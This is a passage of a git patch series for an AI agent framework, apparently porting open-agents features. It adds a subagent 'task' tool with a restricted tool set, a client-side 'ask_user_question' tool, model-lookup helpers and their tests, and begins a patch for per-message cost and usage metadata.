@@ -1,3 +1,4 @@
+import { askUserQuestionTool } from "@/lib/agent/tools/askUserQuestionTool";
 import { bashTool } from "@/lib/agent/tools/bashTool";
 import { readFileTool } from "@/lib/agent/tools/readFileTool";
 import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
@@ -7,6 +8,7 @@ import { globTool } from "@/lib/agent/tools/globTool";
 import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
 import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
 import { skillTool } from "@/lib/agent/tools/skillTool";
+import { taskTool } from "@/lib/agent/tools/taskTool";
 import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
@@ -14,13 +16,24 @@ import type { SkillMetadata } from "@/lib/skills/skillTypes";
  * Each tool reads its sandbox handle + per-prompt context from
  * `experimental_context` at execute time — the factory is otherwise stateless.
  *
- * Currently ships 9 tools:
- *   - 6 file/shell: bash, read, write, edit, grep, glob
- *   - todo_write (planning surface; stateless, echoes the list back)
+ * Currently ships 11 tools:
+ *
+ * Sandbox / file ops (6):
+ *   - bash, read, write, edit, grep, glob
+ *
+ * Composite (2):
+ *   - task — delegate focused work to a subagent (sub-streamText loop;
+ *     subagent has only read/write/edit/grep/glob/bash to prevent
+ *     recursion via task itself, matching open-agents' subagent
+ *     curation)
+ *   - skill — load a project-level skill's SKILL.md (only registered
+ *     when the sandbox has skills available)
+ *
+ * Planning / web / client-side (3):
+ *   - todo_write (stateless planning surface)
  *   - web_fetch (HTTP via curl inside the sandbox)
- *   - skill (load a project-level skill's SKILL.md; only registered when the
- *     sandbox has skills available, so models without any skill catalog
- *     don't see the tool at all and never call it speculatively)
+ *   - ask_user_question (no server execute; chat UI fulfills it and
+ *     the next workflow turn sees the answer in messages)
  *
  * @param options.skills - Discovered skill catalog. When empty / undefined,
  *   `skill` is omitted from the tool record so the model doesn't see it.
@@ -36,6 +49,8 @@ export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) {
     glob: globTool,
     todo_write: todoWriteTool,
     web_fetch: webFetchTool,
+    task: taskTool,
+    ask_user_question: askUserQuestionTool,
     ...(hasSkills ? { skill: skillTool } : {}),
   };
 }
diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts
index acb455164..7cdcf24a4 100644
--- a/lib/agent/tools/AgentContext.ts
+++ b/lib/agent/tools/AgentContext.ts
@@ -1,11 +1,20 @@
+import type { LanguageModel } from "ai";
 import type { VercelState } from "@/lib/sandbox/vercel/state";
 import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
  * Per-tool-call context threaded into the agent via `streamText`'s
- * `experimental_context`. Mirrors the open-agents `AgentContext` shape
- * (subset — slim PR 4 ports only the `bash` tool, so context only needs
- * what `bash` reads).
+ * `experimental_context`. Mirrors the open-agents `AgentContext`
+ * interface (`packages/agent/types.ts`) one-for-one. The only
+ * deviation is structural: `model` / `subagentModel` are
+ * `LanguageModel` instances that cannot ride through a durable
+ * Vercel Workflow input, so `runAgentStep` constructs them per-step
+ * (via `gateway(input.modelId)`) right before calling `streamText`.
+ *
+ * The durable workflow-input shape is `DurableAgentContext` below —
+ * `runAgentStep` widens that into a full `AgentContext` by attaching
+ * the constructed model(s) before `experimental_context` is observed
+ * by any tool.
  *
  * Why no `recoupAccessToken` field? A short-lived per-prompt credential
  * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call
@@ -42,4 +51,24 @@ export type AgentContext = {
    * Empty / undefined when the sandbox has no `skills/` directory.
    */
   skills?: SkillMetadata[];
+  /**
+   * Main agent's language model. Tools read this via `getMainModel`.
+   * Set per-step by `runAgentStep` (not part of the durable input).
+   * Mirrors open-agents' `AgentContext.model: LanguageModel`.
+   */
+  model: LanguageModel;
+  /**
+   * Optional subagent override. If unset, `getSubagentModel` falls
+   * back to `model`. Mirrors open-agents'
+   * `AgentContext.subagentModel?: LanguageModel`.
+   */
+  subagentModel?: LanguageModel;
 };
+
+/**
+ * The JSON-serializable subset of `AgentContext` that survives a
+ * Vercel Workflow durable input (`start(runAgentWorkflow, [...])`).
+ * `LanguageModel` instances aren't serializable, so they're stripped
+ * here and re-attached inside the step.
+ */
+export type DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">;
diff --git a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
new file mode 100644
index 000000000..ee55e6305
--- /dev/null
+++ b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
@@ -0,0 +1,111 @@
+import { describe, it, expect } from "vitest";
+import {
+  askUserQuestionTool,
+  askUserQuestionInputSchema,
+} from "@/lib/agent/tools/askUserQuestionTool";
+
+describe("askUserQuestionInputSchema", () => {
+  it("accepts a valid single-question payload", () => {
+    const result = askUserQuestionInputSchema.safeParse({
+      questions: [
+        {
+          question: "Which model do you want?",
+          header: "Model",
+          options: [
+            { label: "Haiku", description: "Fast" },
+            { label: "Sonnet", description: "Balanced" },
+          ],
+          multiSelect: false,
+        },
+      ],
+    });
+    expect(result.success).toBe(true);
+  });
+
+  it("rejects an empty questions list", () => {
+    const result = askUserQuestionInputSchema.safeParse({ questions: [] });
+    expect(result.success).toBe(false);
+  });
+
+  it("rejects more than 4 questions per payload", () => {
+    const q = {
+      question: "x?",
+      header: "h",
+      options: [
+        { label: "a", description: "a" },
+        { label: "b", description: "b" },
+      ],
+      multiSelect: false,
+    };
+    const result = askUserQuestionInputSchema.safeParse({ questions: [q, q, q, q, q] });
+    expect(result.success).toBe(false);
+  });
+
+  it("rejects a question with fewer than 2 options", () => {
+    const result = askUserQuestionInputSchema.safeParse({
+      questions: [
+        {
+          question: "x?",
+          header: "h",
+          options: [{ label: "only", description: "one" }],
+          multiSelect: false,
+        },
+      ],
+    });
+    expect(result.success).toBe(false);
+  });
+
+  it("rejects a header longer than 12 chars", () => {
+    const result = askUserQuestionInputSchema.safeParse({
+      questions: [
+        {
+          question: "x?",
+          header: "this-header-is-way-too-long",
+          options: [
+            { label: "a", description: "a" },
+            { label: "b", description: "b" },
+          ],
+          multiSelect: false,
+        },
+      ],
+    });
+    expect(result.success).toBe(false);
+  });
+});
+
+describe("askUserQuestionTool — server-side wiring", () => {
+  it("has no execute (it's a client-side tool the chat UI fulfills)", () => {
+    expect(askUserQuestionTool.execute).toBeUndefined();
+  });
+});
+
+describe("askUserQuestionTool.toModelOutput", () => {
+  it("returns a generic message when no output is present", () => {
+    expect(askUserQuestionTool.toModelOutput!(undefined as never)).toEqual({
+      type: "text",
+      value: "User did not respond to questions.",
+    });
+  });
+
+  it("formats `declined: true` as a clear decline message", () => {
+    const result = askUserQuestionTool.toModelOutput!({ declined: true } as never);
+    expect(result).toMatchObject({
+      type: "text",
+      value: expect.stringMatching(/declined to answer/i),
+    });
+  });
+
+  it("formats answered questions as a parseable Q=A summary", () => {
+    const result = askUserQuestionTool.toModelOutput!({
+      answers: {
+        "Which model do you want?": "Haiku",
+        "Which features?": ["Streaming", "Tools"],
+      },
+    } as never);
+    expect(result).toMatchObject({
+      type: "text",
+      value: expect.stringContaining(`"Which model do you want?"="Haiku"`),
+    });
+    expect((result as { value: string }).value).toContain(`"Which features?"="Streaming, Tools"`);
+  });
+});
diff --git a/lib/agent/tools/__tests__/taskTool.test.ts b/lib/agent/tools/__tests__/taskTool.test.ts
new file mode 100644
index 000000000..609037918
--- /dev/null
+++ b/lib/agent/tools/__tests__/taskTool.test.ts
@@ -0,0 +1,146 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { taskTool } from "@/lib/agent/tools/taskTool";
+import { streamText } from "ai";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("ai", async () => {
+  const actual = await vi.importActual<typeof import("ai")>("ai");
+  return { ...actual, streamText: vi.fn() };
+});
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+// `model` is normally attached by `runAgentStep` before the subagent
+// sees the context. The opaque sentinel below is enough for taskTool
+// to pass it into `streamText` — we assert the same instance flows
+// through.
+const mainModel = { __sentinel: "main-model" } as never;
+const subagentModelOverride = { __sentinel: "subagent-model" } as never;
+const ctx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+  model: mainModel,
+};
+
+/**
+ * Fake `streamText` result whose only assistant message carries `finalText`.
+ */
+function makeStreamTextResult(finalText: string) {
+  // Stream stays empty — execute only awaits `result.finishReason` + result.response
+  async function* noChunks() {}
+  const assistantMessage = {
+    role: "assistant",
+    content: [{ type: "text", text: finalText }],
+  };
+  return {
+    fullStream: noChunks(),
+    finishReason: Promise.resolve("stop"),
+    response: Promise.resolve({ messages: [assistantMessage] }),
+  };
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  vi.mocked(connectVercel).mockResolvedValue({ workingDirectory: "/sandbox/mono" } as never);
+});
+
+describe("taskTool.execute", () => {
+  it("runs a sub-streamText with the subagent system prompt + task + instructions", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("Task done.") as never);
+    const result = (await taskTool.execute!(
+      { task: "Find the largest .ts file", instructions: "Use glob and stat to find it" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; summary: string };
+    expect(result.success).toBe(true);
+    expect(result.summary).toBe("Task done.");
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as Record<string, unknown>;
+    // system prompt contains task + instructions so the subagent knows its scope
+    expect(args.system).toEqual(expect.stringContaining("Find the largest .ts file"));
+    expect(args.system).toEqual(expect.stringContaining("Use glob and stat"));
+  });
+
+  it("registers only the executor tool set (no recursion, no task/ask/skill/todo/fetch)", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
+    await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never);
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { tools: Record<string, unknown> };
+    const toolNames = Object.keys(args.tools).sort();
+    expect(toolNames).toEqual(["bash", "edit", "glob", "grep", "read", "write"]);
+    // Critical: NO task (recursion guard) and NO client-side tools.
+    expect(args.tools).not.toHaveProperty("task");
+    expect(args.tools).not.toHaveProperty("ask_user_question");
+    expect(args.tools).not.toHaveProperty("skill");
+    expect(args.tools).not.toHaveProperty("todo_write");
+    expect(args.tools).not.toHaveProperty("web_fetch");
+  });
+
+  it("passes a non-empty prompt so the model has something to act on", async () => {
+    // Regression: a previous version called streamText with `messages: []`,
+    // which caused the AI SDK to throw NoOutputGeneratedError because zero
+    // steps were recorded — the model had a system prompt but no user turn
+    // to respond to. The subagent must receive an explicit user-side trigger.
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
+    await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never);
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as {
+      prompt?: string;
+      messages?: unknown[];
+    };
+    const hasPrompt = typeof args.prompt === "string" && args.prompt.length > 0;
+    const hasMessages = Array.isArray(args.messages) && args.messages.length > 0;
+    expect(hasPrompt || hasMessages).toBe(true);
+  });
+
+  it("inherits the parent's `model` from agent context when no subagentModel override is set", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
+    await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never);
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
+    expect(args.model).toBe(mainModel);
+  });
+
+  it("prefers `subagentModel` over `model` when both are set on the context", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
+    await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: { ...ctx, subagentModel: subagentModelOverride },
+    } as never);
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
+    expect(args.model).toBe(subagentModelOverride);
+  });
+
+  it("returns success:false when no assistant text is in the response", async () => {
+    vi.mocked(streamText).mockReturnValue({
+      fullStream: (async function* () {})(),
+      finishReason: Promise.resolve("stop"),
+      response: Promise.resolve({ messages: [] }),
+    } as never);
+    const result = (await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; summary: string };
+    expect(result.success).toBe(false);
+    expect(result.summary).toMatch(/no.*assistant/i);
+  });
+
+  it("returns success:false with a descriptive error when streamText throws", async () => {
+    vi.mocked(streamText).mockImplementation(() => {
+      throw new Error("gateway down");
+    });
+    const result = (await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/gateway down/);
+  });
+
+  it("throws when agent context is missing the `model` field", async () => {
+    await expect(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: { sandbox: ctx.sandbox /* no model */ },
+      } as never),
+    ).rejects.toThrow(/model not initialized/i);
+  });
+});
diff --git a/lib/agent/tools/askUserQuestionTool.ts b/lib/agent/tools/askUserQuestionTool.ts
new file mode 100644
index 000000000..8d5e1f4ed
--- /dev/null
+++ b/lib/agent/tools/askUserQuestionTool.ts
@@ -0,0 +1,90 @@
+import { tool, type UIToolInvocation } from "ai";
+import { z } from "zod";
+
+const optionSchema = z.object({
+  label: z.string().describe("1-5 words, concise choice text"),
+  description: z.string().describe("Explanation of trade-offs/implications"),
+});
+
+const questionSchema = z.object({
+  question: z.string().describe("The complete question to ask, ends with '?'"),
+  header: z.string().max(12).describe("Short label for tab/chip display"),
+  options: z.array(optionSchema).min(2).max(4),
+  multiSelect: z.boolean().default(false),
+});
+
+export const askUserQuestionInputSchema = z.object({
+  questions: z.array(questionSchema).min(1).max(4),
+});
+
+export type AskUserQuestionInput = z.infer<typeof askUserQuestionInputSchema>;
+
+// Output is filled in by the chat UI after the user answers. Either:
+//   - `{ answers: { [question]: string | string[] } }` — keyed by question text
+//   - `{ declined: true }` — user dismissed the question component
+const answerValueSchema = z.string().or(z.array(z.string()));
+const askUserQuestionOutputSchema = z
+  .object({ answers: z.record(z.string(), answerValueSchema) })
+  .or(z.object({ declined: z.literal(true) }));
+
+export type AskUserQuestionOutput = z.infer<typeof askUserQuestionOutputSchema>;
+
+/**
+ * `ask_user_question` — a client-side tool that lets the agent stop
+ * and gather input from a human. There is deliberately no server
+ * `execute`: once the model emits the tool-call, `streamText` halts,
+ * the chat UI renders the questions and collects the answers, and
+ * the result comes back as a `tool-output-available` part inside the
+ * `messages` of the next workflow request. That next turn resumes
+ * from where this one stopped, so no WDK pause/resume hook is needed.
+ *
+ * `toModelOutput` turns the (eventual) answers into one text block
+ * the model can read on the following turn.
+ */
+export const askUserQuestionTool = tool({
+  description: `Use this tool when you need to ask the user questions during execution. This allows you to:
+1. Gather user preferences or requirements
+2. Clarify ambiguous instructions
+3. Get decisions on implementation choices as you work
+4. Offer choices to the user about what direction to take.
+
+Usage notes:
+- Users will always be able to select "Other" to provide custom text input
+- Use multiSelect: true to allow multiple answers to be selected for a question
+- If you recommend a specific option, make that the first option in the list and add "(Recommended)" at the end of the label
+- Questions appear as tabs; users navigate between them before submitting`,
+  inputSchema: askUserQuestionInputSchema,
+  outputSchema: askUserQuestionOutputSchema,
+  // Intentionally no `execute`: the tool is fulfilled client-side. The run
+  // stops after the tool-call and the chat UI supplies the result later.
+  toModelOutput: output => {
+    // Every branch yields one text part for the model to read next turn.
+    const asText = (value: string) => ({ type: "text" as const, value });
+
+    if (!output) {
+      return asText("User did not respond to questions.");
+    }
+
+    if ("declined" in output && output.declined) {
+      return asText(
+        "User declined to answer questions. You should continue without this information or ask in a different way.",
+      );
+    }
+
+    if (!("answers" in output)) {
+      return asText("User responded to questions.");
+    }
+
+    // Render each answer as "question"="answer"; multi-select answers are comma-joined.
+    const pairs: string[] = [];
+    for (const [question, answer] of Object.entries(output.answers)) {
+      const value = Array.isArray(answer) ? answer.join(", ") : answer;
+      pairs.push(`"${question}"="${value}"`);
+    }
+    return asText(
+      `User has answered your questions: ${pairs.join(", ")}. You can now continue with the user's answers in mind.`,
+    );
+  },
+});
+
+export type AskUserQuestionToolUIPart = UIToolInvocation<typeof askUserQuestionTool>;
diff --git a/lib/agent/tools/buildSubagentTools.ts b/lib/agent/tools/buildSubagentTools.ts
new file mode 100644
index 000000000..336983252
--- /dev/null
+++ b/lib/agent/tools/buildSubagentTools.ts
@@ -0,0 +1,32 @@
+import { bashTool } from "@/lib/agent/tools/bashTool";
+import { readFileTool } from "@/lib/agent/tools/readFileTool";
+import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { grepTool } from "@/lib/agent/tools/grepTool";
+import { globTool } from "@/lib/agent/tools/globTool";
+
+/**
+ * Assemble the tool map handed to a subagent. Mirrors open-agents'
+ * `executor` subagent: bash, read, write, edit, grep, glob.
+ *
+ * Tools the parent agent has that are deliberately left out:
+ *   - `task` — recursion guard; subagents are leaves of the agent tree,
+ *     and nesting would bloat traces, double cost per spawn, and risk
+ *     infinite loops.
+ *   - `ask_user_question` — subagents run without human input.
+ *   - `skill` — skill loading is the parent's job.
+ *   - `todo_write` — planning belongs to the parent.
+ *   - `web_fetch` — parity with open-agents' executor / explorer /
+ *     design subagents, which all omit it.
+ */
+export function buildSubagentTools() {
+  const subagentTools = {
+    bash: bashTool,
+    read: readFileTool,
+    write: writeFileTool,
+    edit: editFileTool,
+    grep: grepTool,
+    glob: globTool,
+  };
+  return subagentTools;
+}
diff --git a/lib/agent/tools/getMainModel.ts b/lib/agent/tools/getMainModel.ts
new file mode 100644
index 000000000..961a038b5
--- /dev/null
+++ b/lib/agent/tools/getMainModel.ts
@@ -0,0 +1,26 @@
+import type { LanguageModel } from "ai";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Look up the main agent's language model on `experimental_context`.
+ * Port of open-agents' `getMainModel` (`tools/utils.ts`).
+ *
+ * @param experimental_context - Opaque context object the AI SDK threads
+ *   into tool execute callbacks.
+ * @param toolName - Optional tool name, appended to the error message.
+ * @returns The `model` stored on the context.
+ * @throws Error when the value fails `isAgentContext` or carries no
+ *   `model`; the message lists the context keys when a context exists.
+ */
+export function getMainModel(experimental_context: unknown, toolName?: string): LanguageModel {
+  const ctx = isAgentContext(experimental_context) ? experimental_context : undefined;
+  if (ctx?.model) return ctx.model;
+
+  const toolSuffix = toolName ? ` (tool: ${toolName})` : "";
+  let detail = "Context is undefined or null";
+  if (ctx) {
+    detail = `Context exists but model is missing. Context keys: ${Object.keys(ctx).join(", ")}`;
+  }
+  const hint = "Ensure runAgentStep sets experimental_context: { model, ... }";
+  throw new Error(`Model not initialized in context${toolSuffix}. ${detail}. ${hint}`);
+}
diff --git a/lib/agent/tools/getSubagentModel.ts b/lib/agent/tools/getSubagentModel.ts
new file mode 100644
index 000000000..07735485e
--- /dev/null
+++ b/lib/agent/tools/getSubagentModel.ts
@@ -0,0 +1,24 @@
+import type { LanguageModel } from "ai";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Look up the language model a subagent should run on. Prefers the
+ * dedicated `subagentModel` on `experimental_context` and falls back
+ * to the main agent's `model` when none is configured. Port of
+ * open-agents' `getSubagentModel` (`tools/utils.ts`):
+ * `ctx.subagentModel ?? ctx.model`.
+ *
+ * @param experimental_context - Opaque context object the AI SDK threads
+ *   into tool execute callbacks.
+ * @param toolName - Optional tool name, appended to the error message.
+ * @throws Error when the value fails `isAgentContext` or carries no
+ *   main `model` — even if a `subagentModel` is present.
+ */
+export function getSubagentModel(experimental_context: unknown, toolName?: string): LanguageModel {
+  const ctx = isAgentContext(experimental_context) ? experimental_context : undefined;
+  if (ctx?.model) return ctx.subagentModel ?? ctx.model;
+
+  const toolSuffix = toolName ? ` (tool: ${toolName})` : "";
+  const hint = "Ensure runAgentStep sets experimental_context: { model, ... }";
+  throw new Error(`Model not initialized in context${toolSuffix}. ${hint}`);
+}
diff --git a/lib/agent/tools/taskTool.ts b/lib/agent/tools/taskTool.ts
new file mode 100644
index 000000000..83381d58f
--- /dev/null
+++ b/lib/agent/tools/taskTool.ts
@@ -0,0 +1,122 @@
+import { streamText, stepCountIs, tool } from "ai";
+import { z } from "zod";
+import { buildSubagentTools } from "@/lib/agent/tools/buildSubagentTools";
+import { getSubagentModel } from "@/lib/agent/tools/getSubagentModel";
+
+const SUBAGENT_STEP_LIMIT = 30;
+
+/**
+ * Input contract for the `task` tool: a short display label plus the
+ * full brief handed to the subagent.
+ */
+const taskInputSchema = z.object({
+  task: z.string().describe("Short description of the task (displayed to user)"),
+  instructions: z.string().describe(
+    "Detailed instructions for the subagent. Include:\n" +
+      "- Goal and deliverables\n" +
+      "- Step-by-step procedure\n" +
+      "- Constraints and patterns to follow\n" +
+      "- How to verify the work",
+  ),
+});
+
+const SUBAGENT_SYSTEM_PROMPT = `You are a focused subagent invoked by a parent agent. Run autonomously — do not ask the user clarifying questions. Complete the delegated task using the tools you have, then return a concise summary of what you did.
+
+Constraints:
+- Up to ${SUBAGENT_STEP_LIMIT} tool steps total
+- No follow-up questions to the user
+- Stay within the scope described in the task; do not pursue tangents
+- End with a brief plain-text summary (no markdown headings, no bulleted action list — just what you accomplished)`;
+
+/**
+ * `task` — delegate focused, autonomous work to a subagent. The
+ * subagent runs its own `streamText` loop with a curated tool set,
+ * isolated from the parent's conversation history, and the tool
+ * resolves to `{ success: true, summary }` on completion or to
+ * `{ success: false, ... }` when the run fails or yields no text.
+ *
+ * Slim port of open-agents' multi-type SUBAGENT_REGISTRY → single
+ * generic subagent. Streaming progress isn't piped to the UI; add an
+ * async-generator execute later if live progress matters.
+ */
+export const taskTool = tool({
+  description: `Launch a subagent to handle complex tasks autonomously.
+
+WHEN TO USE:
+- Clearly-scoped work that can be delegated with explicit instructions
+- Work where focused execution would clutter the main conversation
+- Multi-step exploration / refactoring that you'd otherwise interleave with other turns
+
+WHEN NOT TO USE (do it yourself):
+- Simple, single-file or single-change edits
+- Tasks where you already have all the context you need
+- Ambiguous work that requires back-and-forth clarification
+
+BEHAVIOR:
+- The subagent works AUTONOMOUSLY without asking follow-up questions
+- It runs up to ${SUBAGENT_STEP_LIMIT} tool steps and then returns
+- It returns ONLY a concise summary — internal steps are isolated from the parent
+
+HOW TO USE:
+- Provide a short \`task\` string summarizing the goal (for display)
+- Provide detailed \`instructions\` including goals, steps, constraints, and verification criteria
+
+IMPORTANT:
+- Be explicit and concrete — the subagent cannot ask clarifying questions
+- Include critical context (APIs, function names, file paths) in the instructions
+- The parent agent does not see the subagent's internal tool calls, only its final summary`,
+  inputSchema: taskInputSchema,
+  execute: async ({ task, instructions }, { experimental_context, abortSignal }) => {
+    // ctx.subagentModel ?? ctx.model; throws (outside the try, so the
+    // failure propagates) when runAgentStep never populated the context.
+    const subagentModel = getSubagentModel(experimental_context, "task");
+
+    try {
+      // `prompt` (not `messages: []`) is required: with only a system prompt
+      // the AI SDK records zero steps and throws NoOutputGeneratedError.
+      const result = streamText({
+        model: subagentModel,
+        system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`,
+        prompt: "Complete this task and provide a summary of what you accomplished.",
+        tools: buildSubagentTools(),
+        stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT),
+        experimental_context,
+        abortSignal,
+      });
+
+      // Drain fullStream so the subagent actually runs to completion.
+      // streamText reports failures as `error` parts instead of throwing;
+      // rethrow them so a broken run is not summarized from stale text or
+      // masked by a generic NoOutputGeneratedError.
+      for await (const part of result.fullStream) {
+        if (part.type === "error") {
+          throw part.error instanceof Error ? part.error : new Error(String(part.error));
+        }
+      }
+
+      const response = await result.response;
+      const lastAssistant = response.messages.findLast(m => m.role === "assistant");
+      const content = lastAssistant?.content;
+
+      let summary = "";
+      if (typeof content === "string") {
+        summary = content;
+      } else if (Array.isArray(content)) {
+        const lastText = content.findLast(p => p.type === "text");
+        if (lastText && "text" in lastText) summary = lastText.text;
+      }
+
+      if (!summary) {
+        return {
+          success: false,
+          summary: "Subagent finished with no assistant text. The task may be incomplete.",
+        };
+      }
+
+      return { success: true, summary };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Subagent failed: ${message}` };
+    }
+  },
+});

From bd67ac7d277fdcc6be77387cfcefe54bf2a666f6 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 18:57:36 -0500
Subject: [PATCH 07/10] feat(chat-workflow): emit per-message cost/usage
 metadata (cutover Bundle C) (#592)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .../workflows/__tests__/runAgentStep.test.ts  | 102 ++++++++
 app/lib/workflows/runAgentStep.ts             |  10 +-
 .../messageMetadata/AgentMessageMetadata.ts   |  29 +++
 .../AgentStepFinishMetadata.ts                |  11 +
 .../GatewayProviderMetadata.ts                |  18 ++
 .../__tests__/addLanguageModelUsage.test.ts   |  49 ++++
 .../__tests__/addTokenCounts.test.ts          |  27 ++
 .../buildMessageMetadataCallback.test.ts      |  93 +++++++
 .../__tests__/extractGatewayCost.test.ts      |  28 +++
 .../__tests__/hasGatewayShape.test.ts         |  25 ++
 .../messageMetadata/addLanguageModelUsage.ts  |  49 ++++
 lib/agent/messageMetadata/addTokenCounts.ts   |  13 +
 .../buildMessageMetadataCallback.ts           |  81 ++++++
 .../messageMetadata/extractGatewayCost.ts     |  20 ++
 lib/agent/messageMetadata/hasGatewayShape.ts  |  18 ++
 lib/chat/setupChatRequest.ts                  |  10 +-
 package.json                                  |  12 +-
 pnpm-lock.yaml                                | 230 +++++-------------
 18 files changed, 648 insertions(+), 177 deletions(-)
 create mode 100644 app/lib/workflows/__tests__/runAgentStep.test.ts
 create mode 100644 lib/agent/messageMetadata/AgentMessageMetadata.ts
 create mode 100644 lib/agent/messageMetadata/AgentStepFinishMetadata.ts
 create mode 100644 lib/agent/messageMetadata/GatewayProviderMetadata.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts
 create mode 100644 lib/agent/messageMetadata/addLanguageModelUsage.ts
 create mode 100644 lib/agent/messageMetadata/addTokenCounts.ts
 create mode 100644 lib/agent/messageMetadata/buildMessageMetadataCallback.ts
 create mode 100644 lib/agent/messageMetadata/extractGatewayCost.ts
 create mode 100644 lib/agent/messageMetadata/hasGatewayShape.ts

diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts
new file mode 100644
index 000000000..429a37505
--- /dev/null
+++ b/app/lib/workflows/__tests__/runAgentStep.test.ts
@@ -0,0 +1,102 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { streamText } from "ai";
+import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
+
+vi.mock("ai", async () => {
